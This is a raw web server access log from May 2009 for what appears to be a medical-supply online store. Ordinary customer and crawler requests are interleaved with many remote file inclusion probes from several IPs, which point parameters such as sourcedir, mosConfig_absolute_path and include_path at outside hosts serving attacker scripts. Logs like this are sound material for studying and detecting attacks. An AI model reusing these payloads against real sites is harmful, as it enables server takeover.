201.28.103.46 - - [19/May/2009:00:00:05 -0400] "GET /logs/access_log.Q108090100%20%20//templates/head.php?APB_SETTINGS[template_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:00:00:22 -0400] "GET /?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:00:00:22 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:00:00:22 -0400] "GET /logs/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:00:00:24 -0400] "GET /?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:00:00:24 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:00:00:24 -0400] "GET /logs/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:00:55 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:00:55 -0400] "GET /logs/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:00:55 -0400] "GET /?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:00:01:04 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:00:01:09 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:01:09 -0400] "GET /?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:01:10 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:01:12 -0400] "GET /logs/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:01:14 -0400] "GET /logs/access_log.Q108110900%20%20//templates/head.php?APB_SETTINGS[template_path]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.244.120.22 - - [19/May/2009:00:01:29 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dentogen" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
220.244.120.22 - - [19/May/2009:00:01:29 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dentogen" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
212.150.52.114 - - [19/May/2009:00:01:51 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.143.48.248 - - [19/May/2009:00:01:53 -0400] "GET /logs/error_log.Q108061700//admin/ST_platforms.php?include_path=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
221.143.48.248 - - [19/May/2009:00:01:53 -0400] "GET //admin/ST_platforms.php?include_path=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
221.143.48.248 - - [19/May/2009:00:01:58 -0400] "GET /logs//admin/ST_platforms.php?include_path=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
211.115.89.68 - - [19/May/2009:00:02:08 -0400] "GET /logs/access_log.Q108090100%20%20//templates/head.php?APB_SETTINGS[template_path]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:02:10 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:00:02:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
97.100.66.240 - - [19/May/2009:00:02:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:19 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
122.153.212.195 - - [19/May/2009:00:02:22 -0400] "GET /logs/access_log.Q109021500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:22 -0400] "GET /?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:00:02:22 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:22 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:22 -0400] "GET /logs/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:25 -0400] "GET /?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:25 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:25 -0400] "GET /logs/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:26 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:26 -0400] "GET /?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:02:26 -0400] "GET /logs/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:00:02:26 -0400] "GET /?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:00:02:26 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:00:02:27 -0400] "GET /logs/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
220.181.7.97 - - [19/May/2009:00:02:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
97.100.66.240 - - [19/May/2009:00:02:32 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37788 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:34 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:34 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:34 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:34 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:34 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:35 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:35 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:35 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:36 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:02:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
123.125.64.38 - - [19/May/2009:00:02:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.115.89.68 - - [19/May/2009:00:02:54 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
97.100.66.240 - - [19/May/2009:00:02:58 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT HTTP/1.1" 200 37996 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:03:02 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:03:11 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L009376402BD1140074ED06I+M37+ENG HTTP/1.1" 200 76110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:03:14 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009376402BD1140074ED06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:03:14 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009376402BD1140074ED06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:03:14 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009376402BD1140074ED06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:03:29 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009376402BD1140074ED06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
91.121.210.42 - - [19/May/2009:00:03:30 -0400] "GET /logs/access_log.Q108100900/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:30 -0400] "GET /logs/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:30 -0400] "GET /?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:03:34 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:36 -0400] "GET /?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:36 -0400] "GET /logs/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:36 -0400] "GET /logs/access_log.Q108100900%20%20/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:37 -0400] "GET /?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:37 -0400] "GET /logs/access_log.Q108082900/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:37 -0400] "GET /logs/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:03:40 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:03:40 -0400] "GET /logs/access_log.Q108082900%20%20/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:00:03:42 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:03:42 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:03:45 -0400] "GET /?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:03:45 -0400] "GET /logs/access_log.Q108082900/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
